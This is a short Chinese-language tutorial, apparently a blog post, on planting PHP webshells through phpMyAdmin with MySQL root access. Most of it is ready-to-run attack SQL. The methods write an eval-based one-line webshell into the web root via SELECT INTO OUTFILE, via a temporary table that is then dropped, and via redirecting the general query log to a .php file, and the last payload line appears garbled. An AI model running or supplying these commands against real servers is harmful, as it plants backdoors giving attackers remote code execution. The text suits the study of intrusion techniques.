一. 什么是phpMyAdmin
二. 如何获取MySQL root账号密码
一. phpMyAdmin写入webshell的方法


select '<?php @eval($_POST[cmd]);?>'INTO OUTFILE 'E:/phpstudy_pro/WWW/test.php'

CREATE TABLE test( id text(500) not null);
INSERT INTO test (id) VALUES('<?php @eval($_POST[cmd]);?>');
SELECT id FROM test INTO OUTFILE 'E:/phpstudy_pro/WWW/1.php';
DROP TABLE IF EXISTS test;

show variables like '%general%';
set global general_log = on;

set global general_log_file = 'E:/phpstudy_pro/WWW/1.php'

select '"admin"]); '; assert($_POST[


到这里就完成了前半部分的
通过select into outfile 语句、
创建数据库和表、全局日志写入webshell
下一篇会为大家带来
通过慢查询日志、CVE-2018-12613 、
CVE-2018-19968 phpmyadmin文件
包含写入webshell
敬请期待
请先登录
+1
已点过赞
0
分享到: